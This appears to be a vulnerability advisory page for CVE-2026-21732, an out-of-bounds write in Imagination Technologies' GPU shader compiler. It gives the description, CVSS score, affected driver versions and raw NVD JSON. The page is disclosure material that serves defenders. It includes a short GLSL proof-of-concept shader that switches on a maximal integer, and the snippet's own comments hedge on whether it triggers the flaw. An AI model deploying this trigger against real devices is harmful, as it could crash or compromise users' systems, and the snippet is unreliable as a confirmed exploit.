Security Vulnerability Report
CVE-2026-21732 CVSS 9.6 CRITICAL

CVE-2026-21732

Published: 2026-03-20 23:16:42
Last Modified: 2026-04-21 16:55:06
Source: 367425dc-4d06-4041-9650-c2dc6aaa27ce

Description

A web page that contains unusual GPU shader code is loaded into the GPU compiler process and can trigger an out-of-bounds write crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges, this could enable further exploits on the device. An edge case using a very large value in switch statements in GPU shader code can cause a segmentation fault in the GPU shader compiler due to an out-of-bounds write access.

CVSS Details

CVSS Score: 9.6
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:imaginationtech:ddk:*:*:*:*:*:*:*:* (versions 24.1 through 25.1, inclusive) - VULNERABLE
cpe:2.3:a:imaginationtech:ddk:1.17:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:imaginationtech:ddk:1.18:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:imaginationtech:ddk:23.2:*:*:*:*:*:*:* - VULNERABLE
Imagination Technologies GPU drivers (see the vendor advisory for specific versions)
Other affected platforms that include this GPU compiler library

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
glsl
// PoC for CVE-2026-21732: GPU Shader Compiler Out-of-Bounds Write
// This GLSL snippet demonstrates the trigger condition
#version 450

layout(location = 0) out vec4 fragColor;

void main() {
    // Using a very large integer value in a switch statement
    int trigger_value = 2147483647;
    switch (trigger_value) {
        case 1:
            fragColor = vec4(1.0, 0.0, 0.0, 1.0);
            break;
        // The compiler may mishandle the jump table generation
        // for values far outside the case range, leading to OOB write.
        default:
            fragColor = vec4(0.0, 0.0, 1.0, 1.0);
            break;
    }
}

References

https://www.imaginationtech.com/gpu-driver-vulnerabilities/ - Vendor Advisory

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21732", "sourceIdentifier": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "published": "2026-03-20T23:16:42.480", "lastModified": "2026-04-21T16:55:05.810", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A web page that contains unusual GPU shader code is loaded into the GPU compiler process and can trigger a write out-of-bounds write crash in the GPU shader compiler library. On certain platforms, when the compiler process has system privileges this could enable further exploits on the device.\n\n\n\nAn edge case using a very large value in switch statements in GPU shader code can cause a segmentation fault in the GPU shader compiler due to an out-of-bounds write access."}, {"lang": "es", "value": "Una página web que contiene código de sombreador de GPU inusual se carga en el proceso del compilador de GPU y puede desencadenar un fallo por escritura fuera de límites en la biblioteca del compilador de sombreadores de GPU. En ciertas plataformas, cuando el proceso del compilador tiene privilegios de sistema, esto podría permitir explotaciones adicionales en el dispositivo.\n\nUn caso límite que utiliza un valor muy grande en sentencias switch en el código de sombreador de GPU puede causar un fallo de segmentación en el compilador de sombreadores de GPU debido a un acceso de escritura fuera de límites."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "type": "Secondary", 
"description": [{"lang": "en", "value": "CWE-823"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:*:*:*:*:*:*:*:*", "versionStartIncluding": "24.1", "versionEndIncluding": "25.1", "matchCriteriaId": "A62602A5-EBBC-4F29-9D12-311AD0626512"}, {"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:1.17:*:*:*:*:*:*:*", "matchCriteriaId": "1C2A0AE6-35B7-4221-8E49-6CF3AD9B3927"}, {"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:1.18:*:*:*:*:*:*:*", "matchCriteriaId": "822E865A-168C-4F82-95C7-B1752575C175"}, {"vulnerable": true, "criteria": "cpe:2.3:a:imaginationtech:ddk:23.2:*:*:*:*:*:*:*", "matchCriteriaId": "6F512C3D-CF11-492B-8CAB-CF51965F4250"}]}]}], "references": [{"url": "https://www.imaginationtech.com/gpu-driver-vulnerabilities/", "source": "367425dc-4d06-4041-9650-c2dc6aaa27ce", "tags": ["Vendor Advisory"]}]}}